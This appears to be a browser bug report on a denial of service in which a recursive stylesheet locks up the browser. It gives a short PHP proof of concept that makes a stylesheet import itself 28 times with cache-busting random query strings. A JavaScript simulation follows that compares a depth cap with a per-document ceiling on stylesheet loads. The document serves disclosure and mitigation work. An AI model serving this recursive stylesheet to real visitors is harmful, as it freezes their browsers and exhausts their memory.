Open Bug 618933 Opened 15 years ago Updated 3 years ago

Stylesheet recursive inclusion denial of service

Categories

(Core :: CSS Parsing and Computation, defect)

x86
macOS
defect


People

(Reporter: dveditz, Unassigned)

Details

(Whiteboard: [sg:dos])

K Calhoun writes that a malicious recursive stylesheet can lock up the browser and exhaust memory. Imagine a page containing

  <LINK href="lock.php" rel="stylesheet" type="text/css">

where lock.php consists of references to itself with a random query parameter to prevent cache hits:

  <?php
  // Must be sent before any body output so the response is treated as CSS.
  header("Content-type: text/css");

  // 28 @import lines pointing back at this script, each with a random query
  // string so no two URLs match in the cache.
  for ($i = 0; $i < 28; $i++) {
      echo '@import url("./lock.php?' . rand(10000, 90000) . '");' . "\n";
  }

  // Filler rule with a random numeric selector, followed by a visible rule.
  echo rand(1000, 9000) . "{ color:blue; }\n";
  ?>
  *{ color:red; }

Eventually the browser will chew up memory and die. If the browser tab is closed it will still churn for a while (on the queued requests?).

The reporter suggests "it can be mitigated through having counters and/or lockouts on the number of imported stylesheets one page is allowed, similar to how the browser currently has checks against complex redirect loops."

I don't know if that's an effective approach apart from a hard-coded ceiling on stylesheet includes. If we limit recursion depth the attack can avoid that by lengthening the list of includes at each level. If we limit by domain attackers can set up an infinite number of virtual subdomains. If we limit by eTLD+1 the attacker shells out a bit of cash for more domains.
A max-inclusion-depth would at least keep the attack from being infinite, but probably no realistic limit would prevent a DoS if each stylesheet loaded zillions of child sheets.
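As an added example (not code from the bug report, from the reporter, or from Mozilla's CSS loader), the following models a browser's @import loader against a lock.php-style recursive stylesheet and compares the two mitigations discussed above: a cap on nesting depth versus a hard ceiling on the number of sheets one document may load. The server stand-in, the loader, the policy numbers and all names are assumptions made for the demonstration.

```javascript
// Constructed stand-in for lock.php: every sheet fetched imports itself
// `fanout` times. With cacheBust on, each import URL gets a fresh query string
// (the rand() in the report), so the loader's cache never short-circuits the
// recursion; with it off, every import is the same URL and the cache stops it.
function makeRecursiveServer(fanout, cacheBust = true) {
  let serial = 0;
  return function fetchSheet(url) {
    const imports = [];
    for (let i = 0; i < fanout; i++) {
      imports.push(cacheBust ? `./lock.css?${serial++}` : "./lock.css");
    }
    return { url, imports };
  };
}

// Breadth-first @import loader (an assumed model, not Gecko's).
// policy.maxDepth caps nesting depth; policy.maxSheets caps the total number
// of sheets fetched for one document. Returns how many sheets were actually
// fetched and whether either limit fired.
function loadDocument(fetchSheet, rootUrl, policy) {
  const queue = [{ url: rootUrl, depth: 0 }];
  const seen = new Set(); // the document's stylesheet cache, keyed by URL
  let loaded = 0;
  let blocked = false;
  // Walk the queue by index rather than shift(): the queue can hold tens of
  // thousands of entries and shift() would make this quadratic.
  for (let head = 0; head < queue.length; head++) {
    const { url, depth } = queue[head];
    if (seen.has(url)) continue;                 // cache hit: nothing fetched
    if (depth > policy.maxDepth) { blocked = true; continue; }
    if (loaded >= policy.maxSheets) { blocked = true; break; }
    seen.add(url);
    loaded++;
    for (const child of fetchSheet(url).imports) {
      queue.push({ url: child, depth: depth + 1 });
    }
  }
  return { loaded, blocked };
}

// Closed form for a depth-only policy: every level up to maxDepth is loaded in
// full, so fetches grow as fanout^depth and the attacker beats the limit by
// widening each level instead of deepening the chain.
function sheetsUnderDepthLimit(fanout, maxDepth) {
  let total = 0;
  for (let d = 0; d <= maxDepth; d++) total += fanout ** d;
  return total;
}

function demo() {
  const depthOnly = { maxDepth: 3, maxSheets: Infinity };
  const withCeiling = { maxDepth: 3, maxSheets: 200 };
  return {
    // Same URL every time: the cache ends the recursion after one fetch.
    noCacheBust: loadDocument(makeRecursiveServer(16, false), "./lock.css", depthOnly),
    // Depth limit holds the narrow version to a handful of sheets...
    narrow: loadDocument(makeRecursiveServer(4), "./lock.css", depthOnly),
    // ...but widening each level multiplies the fetches at the same depth.
    wide: loadDocument(makeRecursiveServer(16), "./lock.css", depthOnly),
    // A per-document ceiling bounds the damage regardless of fan-out.
    wideCeiling: loadDocument(makeRecursiveServer(16), "./lock.css", withCeiling),
  };
}

console.log(demo());
```

With a depth cap of 3, fan-out 4 costs 85 fetches while fan-out 16 costs 4369, which is the point made above: a depth limit bounds the chain but not the work. Only the per-document ceiling (200 here) gives a bound that does not depend on what the attacker's server returns; the cache check shows why the report's random query string is essential to the attack.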
Severity: normal → S3